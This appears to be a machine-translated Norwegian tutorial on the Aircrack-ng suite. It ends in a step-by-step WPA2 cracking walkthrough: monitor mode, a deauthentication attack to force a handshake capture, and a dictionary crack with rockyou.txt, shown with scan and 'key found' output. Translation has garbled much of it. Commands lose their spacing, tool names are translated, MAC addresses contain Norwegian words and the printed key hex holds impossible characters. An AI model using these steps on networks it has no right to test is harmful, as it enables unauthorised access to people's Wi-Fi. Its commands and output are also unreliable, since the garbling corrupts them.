Slik bruker du Aircrack-ng

How Use Aircrack Ng



Mesteparten av tiden tenker folk aldri på nettverket de er koblet til. De tenker aldri på hvor sikkert nettverket er og hvor mye de risikerer konfidensielle data daglig. Du kan kjøre sårbarhetskontroller på wifi -nettverkene dine ved å bruke et veldig kraftig verktøy som kalles Aircrack-ng og Wireshark. Wireshark brukes til å overvåke nettverksaktivitet. Aircrack-ng er mer som et aggressivt verktøy som lar deg hacke og gi tilgang til trådløse tilkoblinger. Å tenke som en inntrenger har alltid vært den sikreste måten å beskytte seg mot et hack. Du kan kanskje forstå de eksakte handlingene som en inntrenger vil gjøre for å få tilgang til systemet ditt ved å lære om aircrack. Du kan deretter utføre samsvarskontroller på ditt eget system for å sikre at det ikke er usikkert.

Aircrack-ng er et komplett sett med programvare designet for å teste WiFi -nettverkssikkerhet. Det er ikke bare et enkelt verktøy, men en samling verktøy, som hver utfører et bestemt formål. Du kan jobbe med forskjellige områder med wifi -sikkerhet, som å overvåke tilgangspunktet, teste, angripe nettverket, knekke wifi -nettverket og teste det. Aircracks viktigste mål er å fange opp pakkene og tyde hasjene for å bryte passordene. Den støtter nesten alle de nye trådløse grensesnittene. Aircrack-ng er en forbedret versjon av en utdatert verktøysuite Aircrack, refererer ng til Ny generasjon . Noen av de fantastiske verktøyene som jobber sammen for å ta en større oppgave.







Airmon:

Airmon-ng er inkludert i aircrack-ng-settet som plasserer nettverkskortet i monitormodus. Nettverkskort vil vanligvis bare godta pakker som er målrettet dem som definert av NICs MAC-adresse, men med airmon-ng vil alle trådløse pakker, enten de er målrettet for dem eller ikke, også bli akseptert. Du bør kunne fange disse pakkene uten å koble til eller autentisere med tilgangspunktet. Den brukes til å kontrollere statusen til et tilgangspunkt ved å sette nettverksgrensesnittet i monitormodus. For det første må man konfigurere de trådløse kortene for å slå på skjermmodus, og deretter drepe alle bakgrunnsprosessene hvis du tror at en prosess forstyrrer det. Etter at prosessene er avsluttet, kan monitormodus aktiveres på det trådløse grensesnittet ved å kjøre kommandoen nedenfor:



[e -postbeskyttet]: ~ $sudoairmon-ng start wlan0#

Du kan også deaktivere skjermmodus ved å stoppe airmon-ng når som helst ved å bruke kommandoen nedenfor:

[e -postbeskyttet]: ~ $sudoairmon-ng stopp wlan0#

Airodump:

Airodump-ng brukes til å liste opp alle nettverkene rundt oss og for å se verdifull informasjon om dem. Den grunnleggende funksjonaliteten til airodump-ng er å snuse pakker, så det er i hovedsak programmert til å ta alle pakkene rundt oss mens de settes i monitormodus. Vi vil kjøre den mot alle tilkoblinger rundt oss og samle inn data som antall klienter som er koblet til nettverket, deres tilhørende mac -adresser, krypteringsstil og kanalnavn og deretter begynne å målrette mot vårt målnettverk.

Ved å skrive kommandoen airodump-ng og gi det nettverksgrensesnittnavnet som parameter, kan vi aktivere dette verktøyet. Den viser alle tilgangspunkter, mengden datapakker, krypterings- og autentiseringsmetoder som brukes, og navnet på nettverket (ESSID). Fra et hackingsynspunkt er mac -adressene de viktigste feltene.

[e -postbeskyttet]: ~ $sudoairodump-ng wlx0mon

Aircrack:

Aircrack brukes til å spre passord. Etter å ha fanget alle pakkene ved hjelp av airodump, kan vi knekke nøkkelen ved hjelp av airrack. Det sprekker disse tastene ved å bruke to metoder PTW og FMS. PTW -tilnærming gjøres i to faser. Først brukes bare ARP -pakkene, og først da, hvis nøkkelen ikke blir sprukket etter søket, bruker den alle de andre fangede pakkene. Et plusspunkt ved PTW -tilnærmingen er at ikke alle pakkene brukes til sprekkingen. I den andre tilnærmingen, dvs. FMS, bruker vi både de statistiske modellene og brute force -algene for å knekke nøkkelen. En ordbokmetode kan også brukes.

Luftspill:

Airplay-ng introduserer pakker til et trådløst nettverk for å skape eller akselerere trafikk. Pakker fra to forskjellige kilder kan fanges opp av aireplay-ng. Den første er live -nettverket, og den andre er pakkene fra den allerede eksisterende pcap -filen. Airplay-ng er nyttig under et deaautentiseringsangrep som retter seg mot et trådløst tilgangspunkt og en bruker. Videre kan du utføre noen angrep som kaffe latte-angrep med airplay-ng, et verktøy som lar deg hente en nøkkel fra klientens system. Du kan oppnå dette ved å fange en ARP -pakke og deretter manipulere den og sende den tilbake til systemet. Klienten vil deretter opprette en pakke som kan fanges opp av airodump og aircrack sprekker nøkkelen fra den modifiserte pakken. Noen andre angrepsmuligheter for airplay-ng inkluderer chopchop, fragment arepreplay, etc.

Flybase:

Airbase-ng brukes til å transformere en inntrengeres datamaskin til et kompromittert tilkoblingspunkt som andre kan koble til. Ved å bruke Airbase-ng kan du hevde deg å være et lovlig tilgangspunkt og utføre mann-i-midten-angrep på datamaskiner som er koblet til nettverket ditt. Slike angrep kalles Evil Twin Attacks. Det er umulig for grunnleggende brukere å skille mellom et lovlig tilgangspunkt og et falskt tilgangspunkt. Så den onde tvillingtrusselen er blant de mest truende trådløse truslene vi står overfor i dag.

Airolib-ng:

Airolib fremskynder hackingsprosessen ved å lagre og administrere passordlistene og tilgangspunktet. Databasehåndteringssystemet som brukes av dette programmet er SQLite3, som stort sett er tilgjengelig på alle plattformer. Passordsprekking inkluderer beregning av den parvise hovednøkkelen som den private transientnøkkelen (PTK) hentes ut gjennom. Ved å bruke PTK kan du bestemme rammeldingens identifikasjonskode (MIC) for en gitt pakke og teoretisk finne MIC -en som ligner på pakken, så hvis PTK hadde rett, hadde PMK også rett.

For å se passordlistene og tilgangsnettverk som er lagret i databasen, skriver du inn følgende kommando:

[e -postbeskyttet]: ~ $sudoairolib-ng testdatabase –statistikk

Her er testdatabasen db du vil ha tilgang til eller opprette, og –stats er operasjonen du vil utføre på den. Du kan utføre flere operasjoner på databasefeltene, for eksempel å gi maksimal prioritet til noen SSID eller noe. For å bruke airolib-ng med aircrack-ng, skriv inn følgende kommando:

[e -postbeskyttet]: ~ $sudoaircrack-ng-rtestdatabase wpa2.eapol.cap

Her bruker vi de allerede beregnede PMK -ene som er lagret i testdatabase for å øke hastigheten på passordsprekkingsprosessen.

Sprekker WPA/WPA2 ved hjelp av Aircrack-ng:

La oss se på et lite eksempel på hva aircrack-ng kan gjøre ved hjelp av noen av de fantastiske verktøyene. Vi vil knekke et WPA/WPA2-nettverks forhåndsdelte nøkkel ved hjelp av en ordbokmetode.

Det første vi må gjøre er å liste opp nettverksgrensesnitt som støtter skjermmodus. Dette kan gjøres ved å bruke følgende kommando:

[e -postbeskyttet]: ~ $sudoairmon-ng

PHY -grensesnittdriver -brikkesett

Phy0 wlx0 rtl8xxxu Realtek Semiconductor Corp.

Vi kan se et grensesnitt; nå må vi sette nettverksgrensesnittet vi har funnet (wlx0) i skjermmodus ved å bruke følgende kommando:

[e -postbeskyttet]: ~ $sudoairmon-ng start wlx0

Den har aktivert skjermmodus på grensesnittet wlx0mon .

Nå bør vi begynne å lytte til sendinger fra rutere i nærheten gjennom nettverksgrensesnittet vi har satt i skjermmodus.

[e -postbeskyttet]: ~ $sudoairodump-ng wlx0mon

CH5 ][Forløpt:30s][ 2020-12-02 00:17



BSSID PWR Beacons#Data, #/s CH MB ENC CIPHER AUTH ESSID



E4: 6F:1. 3: 04: CE:31 -Fire fem 62 27 0 154e WPA2 CCMP PSK CrackIt

C4: E9:84:76:10:VÆRE-63 77 0 0 654e. WPA2 CCMP PSK Hackme

C8: 3A:35: A0: 4E: 01-63 84 0 0 854e WPA2 CCMP PSK Net07

74: GIR:88: FA:38: 02-68 28 2 0 elleve54e WPA2 CCMP PSK TP-Link_3802



BSSID STATION PWR Rate Lost Frames Probe



E4: 6F:1. 3: 04: CE:315C: 3A:Fire fem: D7: EA: 8B -3 0- 1e8 5

E4: 6F:1. 3: 04: CE:31C4:67: D3: C2: CD: D7 -331e- 6e0 3

E4: 6F:1. 3: 04: CE:315C: C3: 07:56:61: EF -35 0-1 0 6

E4: 6F:1. 3: 04: CE:31BC:91: B5: F8: 7E: D5 -390e-1 1002 1. 3

Vårt målnettverk er Crackit i dette tilfellet, som for øyeblikket kjører på kanal 1.

For å knekke passordet til målnettverket må vi ta et 4-veis håndtrykk, som skjer når en enhet prøver å koble seg til et nettverk. Vi kan fange den ved å bruke følgende kommando:

[e -postbeskyttet]: ~ $sudoairodump-ng-c 1--bssid E4: 6F:1. 3: 04: CE:31 -i /hjem wlx0

-c : Kanal

–Bss : Bssid av målnettverket

-i : Navnet på katalogen der pcap -filen skal plasseres

Nå må vi vente på at en enhet skal koble seg til nettverket, men det er en bedre måte å fange et håndtrykk. Vi kan deautentisere enhetene til AP ved hjelp av et deauthentication -angrep ved å bruke følgende kommando:

[e -postbeskyttet]: ~ $sudoluftspill-ng-0 -tilE4: 6F:1. 3: 04: CE:31

til : Bssid av målnettverket

-0 : deauthentication angrep

Vi har koblet fra alle enhetene, og nå må vi vente på at en enhet skal koble seg til nettverket.

CH1 ][Forløpt:30s][ 2020-12-02 00:02][WPA håndtrykk: E4: 6F:1. 3: 04: CE:31



BSSID PWR RXQ Beacons#Data, #/s CH MB ENC CIPHER AUTH E



E4: 6F:1. 3: 04: CE:31 -47 1 228 807 36 154. WPA2 CCMP PSK P



BSSID STATION PWR Rate Lost Frames Probe



E4: 6F:1. 3: 04: CE:31BC:91: B5: F8: 7E: D5 -35 0-1 0 1

E4: 6F:1. 3: 04: CE:315C: 3A:Fire fem: D7: EA: 8B -290e- 1e0 22

E4: 6F:1. 3: 04: CE:31 88:28: B3:30:27: 7E -310e-1 0 32

E4: 6F:1. 3: 04: CE:31C4:67: D3: C2: CD: D7 -350e- 6e263 708CrackIt

E4: 6F:1. 3: 04: CE:31D4: 6A: 6A:99: ED: E3 -350e- 0e0 86

E4: 6F:1. 3: 04: CE:315C: C3: 07:56:61: EF -37 0- 1e0 1

Vi fikk et treff, og ved å se på øverste høyre hjørne rett ved siden av tiden, kan vi se at et håndtrykk er fanget. Se nå i den angitte mappen ( /hjem i vårt tilfelle) for a .pcap fil.

For å knekke WPA -nøkkelen kan vi bruke følgende kommando:

[e -postbeskyttet]: ~ $sudoaircrack-ng-a2 -irockyou.txt-bE4: 6F:1. 3: 04: CE:31håndtrykk. cap

b: Bssid av målnettverket

-a2: WPA2 -modus

Rockyou.txt: Ordbokenfilbrukt

Handshake.cap: Thefil hvilkeninneholder fanget håndtrykk

Aircrack-ng1.2beta3

[00:01:49] 10566nøklene testet(1017,96til/s)

NØKKEL FUNNT! [du tok meg]

Hovednøkkel: 8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B 7B 6D

0C 06 08 ED BC 6B H7 J8 K1 A0896B 7B B F7 6FfemtiC


Forbigående nøkkel: 4D C4 5R 6T76 996G 7H 8D EC

H7 J8 K1 A0896B 7B 6D AF 5B 8D 2D A0896B

A5 BD K1 A0896B 0C 08 0C 06 08 ED BC 6B H7 J8 K1 A089

8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B

MAC: CB 5A F8 CE62B2 1B F7 6FfemtiC025 62E9 5D71

Nøkkelen til vårt målnettverk har blitt sprukket.

Konklusjon:

Trådløse nettverk er overalt, brukt av hvert selskap, fra arbeidere som bruker smarttelefoner til industrielle kontrollenheter. Ifølge forskning vil nesten over 50 prosent av internettrafikken være over WiFi i 2021. Trådløse nettverk har mange fordeler, kommunikasjon utenfor dører, rask internettilgang på steder der det er nesten umulig å legge ledninger, kan utvide nettverket uten å installere kabler for enhver annen bruker, og kan enkelt koble mobile enheter til hjemmekontorene dine mens du ikke er der.

Til tross for disse fordelene, er det et stort spørsmålstegn om personvernet og sikkerheten din. Som disse nettverkene; innenfor overføringsområdet for rutere er åpne for alle, de kan lett bli angrepet, og dataene dine kan lett bli kompromittert. For eksempel, hvis du er koblet til noe offentlig wifi, kan alle som er koblet til det nettverket, enkelt kontrollere nettverkstrafikken din ved å bruke litt intelligens og ved hjelp av fantastiske tilgjengelige verktøy og til og med dumpe den.